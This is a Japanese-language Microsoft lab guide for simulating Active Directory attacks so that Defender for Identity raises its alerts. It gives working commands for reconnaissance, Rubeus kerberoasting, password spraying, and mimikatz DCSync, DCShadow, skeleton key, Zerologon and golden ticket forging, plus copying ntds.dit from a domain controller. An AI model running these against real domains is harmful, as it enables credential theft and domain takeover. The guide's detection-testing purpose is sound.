Microsoft Defender for Identityの攻撃シミュレーション
Microsoft Defender for Identityは、ドメイン コントローラーを対象とするマネージド マシン、アンマネージド マシン、または不明なマシンからの異常または疑わしいアクティビティを検出するための強力なソリューションです。
ラボまたはペンテストを実行する場合は、Defender for Identity 構成が適切に構成されていることを確認します。 センサーがすべてのドメイン コントローラーにインストールされ、正常な状態になっていることを確認します。 また、Windows イベント コレクションが適切に構成されていることをチェックします。
多くのアラートでは、アラートを生成する前に機械学習期間が必要です。 学習期間は、各検出の詳細へのリンクに一覧表示されます。 適切な結果を得るには、必要な期間を必ず待ってください。
警告
このラボに含まれるサードパーティのハッキング ツールは、調査目的でのみ提供されます。 Microsoft はこれらのツールを所有しておらず、Microsoft はそれらの動作について保証しません。 それらは予告なしに変更されることがあります。 これらのツールは、テスト ラボ環境でのみ実行する必要があります。
次に、新しいマシン (新しいインストール、マネージド、アンマネージド) から、次のシナリオを試します。
ネットワーク マッピングの偵察 (DNS)
このアラートの詳細については、「 ネットワーク マッピング偵察 (DNS) (外部 ID 2007)」を参照してください。
注意
アラートを再度生成するには、別のユーザーまたは別のコマンドを使用してアクションを実行します。
この偵察は、攻撃者がネットワーク構造をマップし、攻撃の後の手順で興味深いコンピューターをターゲットにするために使用されます。
DNS プロトコルでは、クエリにいくつかの種類があります。 この Defender for Identity セキュリティ アラートにより、不審な要求が検出されます。DNS ではないサーバーから開始された AXFR (転送) を使用しているか、大量の要求を使用している要求のいずれかです。
ワークステーション上のコマンド ラインから、次のコマンドを実行します。
nslookup
server MSDemoDC01.msdemo.local
ls -d msdemo.local
成功または失敗のアクティビティ (接続が拒否されました) とアラートが表示されます。
アラートの詳細:
ユーザーと IP アドレスの偵察
このアラートの詳細については、「 ユーザーと IP アドレス偵察 (SMB) (外部 ID 2012)」を参照してください。
この検出では、ドメイン コントローラーに対して SMB セッションの列挙が実行されると、アラートがトリガーされます。 GPO を取得するには、少なくともユーザーとコンピューターが SYSVOL 共有にアクセスする必要があります。 攻撃者は、この情報を使用して、ユーザーが最近サインインした場所を知り、ネットワーク内を横方向に移動して特定の機密性の高いアカウントにアクセスできます。
ワークステーション上のコマンド ラインから、次のコマンドを実行します。
NetSess.exe MSDemo-DC01.msdemo.local
次のツールを使用できます。 https://www.joeware.net/freetools/tools/netsess/
クライアント コンピューターのタイムラインにアクティビティとアラートが表示されます。
アラートの詳細:
ユーザーとグループ メンバーシップの偵察 (SAMR)
このアラートの詳細については、「 ユーザーとグループのメンバーシップ偵察 (SAMR) (外部 ID 2021)」を参照してください。
この検出では、ユーザーおよびグループ メンバーシップの偵察が、SAMR プロトコルを使用した攻撃の後の手順でディレクトリ構造をマップし、特権アカウントをターゲットにするために攻撃者によって使用されます。
適切なアクセス許可を持つワークステーションのコマンド ラインから、次を実行します。
net user /domain
net group /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Schema Admins" /domain
ユーザー タイムラインにアクティビティとアラートが表示されます。
アラートの詳細:
セキュリティ プリンシパルによる偵察 (LDAP)
このアラートの詳細については、「 セキュリティ プリンシパル偵察 (LDAP) (外部 ID 2038)」を参照してください。
この検出では、Defender for Identity は LDAP セキュリティ プリンシパルの偵察を探します。これは、Kerberoasting 攻撃の最初のフェーズとして一般的に使用されます。 Kerberoasting 攻撃は、対象となるセキュリティ プリンシパル名 (SPN) の一覧を取得するために使われます。次に、攻撃者はこれに対して Ticket Granting Server (TGS) チケットを取得しようとします。
適切なアクセス許可を持つワークステーションのコマンド ラインから、データ収集のためにフランスのセキュリティ機関からツールを実行します。 oradad.exe
利用可能なツール: クライアント コンピューターのタイムラインにアクティビティとアラートが表示されます。 https://github.com/ANSSI-FR/ORADAD/releases
アラートの詳細:
ハニートークン アクティビティ
このアラートの詳細については、「 Honeytoken アクティビティ (外部 ID 2014)」を参照してください。
このハニートークン アカウントは、攻撃者 (魅力的な名前または機密性の高いグループ メンバーシップ) にとって魅力的であり、組織では使用されないままにする必要があります。 それらのアクティビティは、悪意のある動作 (LDAP、NTLM、または Kerberos ログオン試行) を示している可能性があります。
MSTSC.exeまたは対話型ログオンから、間違ったパスワードまたは有効なパスワードでこのアカウントを使用してサインインしてみてください。
ハニートークン ユーザー タイムラインにログオン アクティビティとアラートが表示されます。
アラートの詳細 (ログオン試行に失敗しました):
Active Directory 属性による偵察 (LDAP)
このアラートの詳細については、「 Active Directory 属性偵察 (LDAP) (外部 ID 2210)」を参照してください。
Active Directory LDAP 属性の偵察は、DES または RC4 kerberos 暗号を持つアカウント、Kerberos 事前認証が無効なアカウント、制約のない Kerberos 委任で構成されたサービス アカウントなど、ドメイン環境に関する重要な情報を取得するために攻撃者によって使用されます。
ワークステーションで、adsisearcher (PowerShell) または LDAP ブラウザー (ldp.exeなど) から、次の LDAP フィルターを設定します。
(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2097152)) FindAll() => Kerberos DES が有効になっているアカウントを列挙する
(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304)) FindAll() => Kerberos 事前認証が無効になっているアカウントを列挙する
(&(objectCategory=computer)(!(primaryGroupID=516)(userAccountControl:1.2.840.113556.1.4.803:=524288))) FindAll() => 制約のない委任用に構成されたすべてのサーバーを列挙する (DC を除く)
(&(objectCategory=person)(objectClass=user)(!(userAccountControl:1.2.840.113556.1.4.803:=2))) FindAll() => 有効になっているすべてのアカウントを列挙する
または、管理者権限を持つコマンド ラインから を実行します。
repadmin /showattr * DC=msdemo,DC=local ou repadmin /showattr * DC=msdemo,DC=local /subtree /filter:"((&(objectClass=computer)(msDS-AllowedToActOnBehalfOfOtherIdentity=*)))" /attrs:cn,msDs-AllowedToActOnBehalfOfOtherIdentity => リソース ベースの制約付き委任用に構成されたサーバーを列挙する
クライアント コンピューターのタイムラインにアクティビティとアラートが表示されます。
アラートの詳細:
アカウント列挙の偵察
このアラートの詳細については、「 アカウント列挙偵察 (外部 ID 2003)」を参照してください。
このアラートでは、攻撃者は名前の一覧を使用して Kerberos (または NTLM) 要求を行い、ドメイン内の有効なユーザー名を見つけようとします。 推測によってユーザー名が正常に特定された場合、攻撃者は、セキュリティ プリンシパルの不明な Kerberos エラーまたは NoSuchUser (0xc0000064) NTLM エラーではなく、WrongPassword (0xc000006a) の代わりに必要な事前認証を取得します。
から いくつかの 名前をマージし、組織から有効な名前を追加して、名前 https://github.com/jeanphorn/wordlist/blob/master/usernames.txt のusers.txtリストを作成します。
次に、ワークステーション上の PowerShell セッションから次のコマンドを実行します。
Import-Module .\adlogin.ps1
adlogin users.txt msdemo.local P@ssw0rd!
使用可能なツール: https://github.com/jeanphorn/wordlist と https://github.com/InfosecMatter/Minimalistic-offensive-security-tools
クライアント コンピューターのタイムラインにアクティビティとアラートが表示されます。
アラートの詳細:
Kerberos SPN の公開の疑い
このアラートの詳細については、「 AS-REP 焙煎攻撃の疑い (外部 ID 2412)」を参照してください。
この検出では、Defender for Identity は、攻撃者がツールを使用してサービス アカウントとその対応する SPN (サービス プリンシパル名) を列挙し、サービスの Kerberos サービス チケットを要求し、メモリからチケット付与サービス (TGS) チケットをキャプチャしてハッシュを抽出し、後でオフラインブルート フォース攻撃で使用するために保存するかどうかを確認します。
ワークステーション上のコマンド ラインから、次のコマンドを実行します。
Rubeus.exe kerberoast
Rubeus.exe kerberoast /tgtdeleg
Rubeus.exe asktgs /service:http/msdemo-CM01.msdemo.local /ptt
使用可能なツール: https://github.com/GhostPack/Rubeus または https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/tree/master/dotnet%20v4.5%20compiled%20binaries
ユーザー タイムラインにアクティビティとアラートが表示されます。
アラートの詳細:
Brute-Force攻撃の可能性 (Kerberos、NTLM、LDAP) & パスワード スプレー攻撃
このアラートの詳細については、「 ブルート フォース攻撃の可能性 (Kerberos、NTLM)(外部 ID 2023)」を参照してください。
この検出では、Kerberos または NTLM を使用した多数の認証エラーが発生した場合、またはパスワード スプレーの使用が検出された場合に、アラートがトリガーされます。 Kerberos または NTLM を使用する場合、この種類の攻撃は通常、水平的 (多くのユーザー全体に少数のパスワードを使用する) または 垂直的 (少数のユーザーに大量のパスワードを使用する)、あるいはこの 2 つの任意の組み合わせによって実行されます。
ワークステーションのコマンド ラインから、次のコマンドを実行します。
net user /domain >users.txt
これにより、ドメイン内のユーザーの一覧が取得されます。 結果は 1 つの列に含まれている必要があります。
ワークステーション上の PowerShell コマンド ラインから、次のコマンドを実行します。
Import-Module .\adlogin.ps1
adlogin users.txt msdemo.local P@ssw0rd
これは、すべての既知のユーザー アカウント (多くのアカウントに対して 1 つのパスワード) に対して慎重に作成された 1 つのパスワードを使用したパスワード スプレー攻撃用です。
クライアント コンピューターのタイムラインにアクティビティとアラートが表示されます。
アラートの詳細:
ブルート フォース攻撃の場合は、複数のパスワードを持ついくつかのアカウントにサインオンしてみてください。
クライアント コンピューターのタイムラインにアクティビティとアラートが表示されます。
アラートの詳細:
Data Protection API (DPAPI) マスター キーの悪意のある要求
このアラートの詳細については、「 Data Protection API マスター キーの悪意のある要求 (外部 ID 2020)」を参照してください。
DPAPI は、ブラウザー、暗号化されたファイル、証明書の秘密キー、およびその他の機密データによって保存されたパスワードを安全に保護するために、Windows によって使用されます。 ドメイン コントローラーにはバックアップ マスター キー (RSA 2048) が保持されています。これは、ドメインに参加している Windows マシンで DPAPI で暗号化されたすべてのシークレットの暗号化を解除するために使用できます。
これは、ユーザー パスワードがリセットされるときに必要です。 機密データを含む BLOB は新しいパスワードで暗号化を解除できないため、ドメイン コントローラーはマスター キーを使用してデータを取得する必要があります。
攻撃者は、そのマスター キーを使って、ドメインに参加しているすべてのコンピューター上の DPAPI によって保護された秘密情報の暗号化を解除できます。 この検出では、DPAPI を使ってバックアップ マスター キーが取得されると、Defender for Identity アラートがトリガーされます。
ワークステーション上のコマンド ラインから、管理者アカウントを使用して実行します。
mimikatz # privilege::debug
mimikatz # lsadump::backupkeys /system:msdemo-DC01 /export
使用可能なツール: https://github.com/gentilkiwi/mimikatz/releases
ユーザー タイムラインにアクティビティとアラートが表示されます。
アラートの詳細:
スケルトン キー攻撃の可能性 (暗号化のダウングレード)
このアラートの詳細については、「 スケルトン キー攻撃の可能性 (暗号化ダウングレード)(外部 ID 2010)」を参照してください。
スケルトン キーは、ドメイン コントローラーで実行されるマルウェアです。これを使うと、パスワードなしでアカウントをドメインに対して認証できます。 このマルウェアは多くの場合、より強度の低い暗号化アルゴリズムを使って、ドメイン コントローラー上のユーザーのパスワードをハッシュ化します。 これは、攻撃者が元のアカウントのパスワードをリセットまたは変更することなく、すべての Active Directory アカウントに同じパスワードを使用できることを意味します。
このアラートでは、ドメイン コントローラーからチケットを要求しているアカウントへの以前のKRB_ERR メッセージ暗号化の学習された動作がダウングレードされました。
警告
運用ドメイン コントローラーで信頼されていないツールを実行しないでください。 ドメイン コントローラーが影響を受けたら、簡単なロールバックは行われず、ドメイン コントローラーを降格する必要があります。
ドメイン コントローラー上にシェルがあるワークステーションのコマンド ラインから、ドメイン管理者としてを実行します。
mimikatz # privilege::debug
mimikatz # misc::skeleton
マスター パスワードは mimikatz にする必要があります。
使用可能なツール: https://github.com/gentilkiwi/mimikatz/releases
アラートの詳細:
Netlogon 特権昇格の試行の可能性 (CVE-2020-1472 の悪用)
このアラートの詳細については、「 Netlogon 特権昇格の試行の可能性 (CVE-2020-1472 悪用)(外部 ID 2411)」を参照してください。
このアラートは、攻撃者が Netlogon リモート プロトコル (MS-NRPC) (Netlogon の特権の昇格の脆弱性) を使用して、脆弱な Netlogon セキュリティで保護されたチャネル接続を DC に確立しようとした場合にトリガーされます。
ワークステーションのコマンド ラインから、ローカル管理者アカウントを使用して を実行します。
mimikatz # privilege::debug
mimikatz # lsadump::zerologon /server:msdemo-DC01.msdemo.local /account:msdemo-DC01$ /exploit
使用可能なツール: https://github.com/gentilkiwi/mimikatz/releases
アラートの詳細:
暗号化ファイル システムのリモート プロトコルを介した疑わしいネットワーク接続
このアラートの詳細については、「 Encrypting File System Remote Protocol (外部 ID 2416)」を参照してください。
この検出は、攻撃者が暗号化ファイル システム リモート (EFSRPC) プロトコルの欠陥を悪用して Active Directory ドメインを引き継ぐときにトリガーされます。
ワークステーションのコマンド ラインから、ローカル管理者アカウントを使用して を実行します。
mimikatz # privilege::debug
mimikatz # misc::efs /server:10.4.0.100 /connect:10.4.0.13 /noauth
使用可能なツール: https://github.com/gentilkiwi/mimikatz/releases
アラートの詳細:
DCSync 攻撃の可能性 (ディレクトリ サービスのレプリケーション)
このアラートの詳細については、 DCSync 攻撃の可能性 (ディレクトリ サービスのレプリケーション) (外部 ID 2006) に関するページを参照してください。
攻撃者は DS-Replication-Get-Changes-All アクセス許可を持っている場合、レプリケーション要求を開始して、krbtgt のパスワード ハッシュなど、Active Directory に格納されているデータを取得できます。
この検出では、ドメイン コントローラーではないコンピューターからレプリケーション要求が開始されると、アラートがトリガーされます。
ワークステーション上のコマンド ラインから、少なくともローカル管理者アカウントを使用して を実行します。
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /domain:msdemo.local /user:krbtgt
これにより、krbtgt のパスワード ハッシュが取得され、ゴールデン チケット攻撃に移行します。
使用可能なツール: https://github.com/gentilkiwi/mimikatz/releases
クライアント コンピューターのタイムラインにアクティビティとアラートが表示されます。
アラートでは、ユーザーが DCsync を取得できませんでした (十分なアクセス許可がありません)。
DCShadow 攻撃の可能性 (ドメイン コントローラーの昇格) & (ドメイン コントローラー レプリケーション要求)
このアラートの詳細については、「 DCShadow 攻撃の疑い (ドメイン コントローラーの昇格)」(外部 ID 2028) と DCShadow 攻撃の可能性 (ドメイン コントローラー レプリケーション要求) (外部 ID 2029) に関するページを参照してください。
2 つのアラートを使用できますが、 ドメイン コントローラーレプリケーション要求 アラートにのみ焦点を当てます。 このシナリオでは、攻撃者は悪意のあるレプリケーション要求を開始しようとします。これにより、正規のドメイン コントローラー上の Active Directory オブジェクトを変更できます。これにより、攻撃者はドメイン内で永続化される可能性があります。
ワークステーションのコマンド ラインから、ドメイン管理者アカウントを使用して を実行します。
mimikatz # privilege::debug
mimikatz # lsadump::dcshadow /object:krbtgt /attribute=ntPwdHistory /value:0000000000
mimikatz # lsadump::dcshadow /push
使用可能なツール: https://github.com/gentilkiwi/mimikatz/releases
アラートの詳細:
リモート コード実行の試行
このアラートの詳細については、「 リモート コード実行の試行 (外部 ID 2019)」を参照してください。
Defender for Identity は、クライアント コンピューターからドメイン コントローラーへの PSexec、リモート WMI、PowerShell 接続を検出します。 攻撃者は、ドメイン コントローラーまたは Active Directory フェデレーション サービス (AD FS) (AD FS) サーバーでリモート コマンドを実行して、永続化を作成したり、データを収集したり、サービス拒否 (DOS) を実行したりできます。
ワークステーションのコマンド ラインから、ドメイン管理者アカウントを使用して を実行します。
PSExec.exe -s -i \\msdemo-dc01 powershell.exe
これにより、ドメイン コントローラーで PowerShell セッションが開始されます。
利用可能なツール: Sysinternals のダウンロード
アラートの詳細:
SMB を介したデータ窃盗
このアラートの詳細については、「 SMB 経由のデータ流出 (外部 ID 2030)」を参照してください。
このアラートは、攻撃者が ntds.dit ファイルをドメイン コントローラーからワークステーションにコピーしたときなど、監視対象のドメイン コントローラーからデータの疑わしい転送が観察されたときにトリガーされます。
ワークステーションのコマンド ラインから、ドメイン管理者アカウントを使用して を実行します。
PSEexec -s -i \\msdemo-DC01 cmd.exe => ドメイン コントローラーで cmd セッションを取得する場合
Esentutl /y /i c:\windows\ntds\ntds.dit /d c:\windows\ntds.dit => 流出の ntds.dit ファイルのコピーを取得する
ntds.dit ファイルを DC からワークステーション (Z:) にコピーします。
利用可能なツール: Sysinternals のダウンロード
アラートの詳細:
Defender for Identity では、ワークステーションまたはサーバーからドメイン コントローラーにアップロードされたファイルを追跡することもできます。 これは、異常なアクティビティを検出するのに役立ちます。 この種類のアクティビティは、ユーザー タイムラインから表示されます。
ゴールデン チケットの使用の疑い (暗号化のダウングレード) & (存在しないアカウント) & (時間の異常)
このアラートの詳細については、「 ゴールデン チケットの使用の疑い (暗号化のダウングレード)(外部 ID 2009)」、「 ゴールデン チケットの使用の疑い (存在しないアカウント)(外部 ID 2027)」、および 「ゴールデン チケットの使用の疑い (時刻異常)(外部 ID 2022)」を参照してください。
Defender for Identity は、6 種類のゴールデン チケット攻撃を検出できます。 そのうちの 2 つを見てみましょう。
DCsync 攻撃者からの krbtgt のパスワード ハッシュを使用して、任意のリソースに承認を提供し、チケットの有効期限を任意の時刻に設定する Kerberos チケット許可チケット (TGT) を作成できるようになりました。 この偽の TGT は "ゴールデン チケット" と呼ばれ、攻撃者がネットワークで永続性を実現できるようにします。
ワークステーションのコマンド ラインから、ローカル管理者アカウントを使用して を実行します。
mimikatz # privilege::debugmimikatz # lsadump::dcsync /domain:msdemo.local /user:krbtgt => /rc4 mimikatz # Kerberos::golden /domain:msdemo.local /sid:S-1-5-21-4112553867-xxxxxxxxxxxx /rc4:xxxxxxxxxxxxxxx /user:administrator /id:500 /groups:513,512,520,518,519 /ticket:administrator.kirbi に必要な krbgt のパスワード ハッシュを取得する => 既定の管理者アカウント (RID=500) の偽の TGT を作成し、機密性の高い RID グループを追加する
mimikatz # kerberos::ptt administrator.kirbi => 偽の TGT を読み込む
mimikatz # misc::cmd => cmd を開く
klist=> TGT が読み込まれている場合にチェック
ldp.exe => その後、LDAP サーバーにバインド (ダイジェスト) して、暗号化ダウングレード検出に偽の TGT を使用します
mimikatz # privilege::debugmimikatz # lsadump::dcsync /domain:msdemo.local /user:krbtgt => /rc4:..に必要な krbgt のパスワード ハッシュを取得します。
mimikatz # Kerberos::golden /domain:msdemo.local /sid:S-1-5-21-4112553867-xxxxxxxxxxxx /rc4:xxxxxxxxxxxxxxx /user:XYZ /id:500 /groups:513,512,520,518,519,1107 /ticket:XYZ.kirbi=> 存在しないアカウントの偽の TGT を作成し、機密性の高い RID グループ (2àmn に有効) mimikatz # kerberos::ptt XYZ.kirbi を追加する => TGT が読み込まれている場合は偽の TGT klist =>> チェックを読み込みldp.exe、 LDAP サーバーにバインド (ダイジェスト) して、存在しないアカウント検出に偽の TGT を使用します
使用可能なツール: https://github.com/gentilkiwi/mimikatz/releases
アラートの詳細:
機密性の高いグループへの疑わしい追加
このアラートの詳細については、「 機密性の高いグループへの疑わしい追加 (外部 ID 2024)」を参照してください。
攻撃者は、高い特権を持つグループにユーザーを追加して、より多くのリソースにアクセスし、永続化を取得する可能性があります。 このアラートには機械学習期間が必要です (たとえば、このユーザーは通常、機密性の高いグループにこの追加を実行しません)。
RSAT を使用するワークステーションから、ドメイン管理者アカウントから開始します。
dsa.msc => エンタープライズ管理者やドメイン管理者などの機密性の高いグループにユーザーを追加する
使用可能なツール: https://www.microsoft.com/download/details.aspx?id=45520
ユーザー タイムラインにアクティビティとアラートが表示されます。
アラートの詳細:
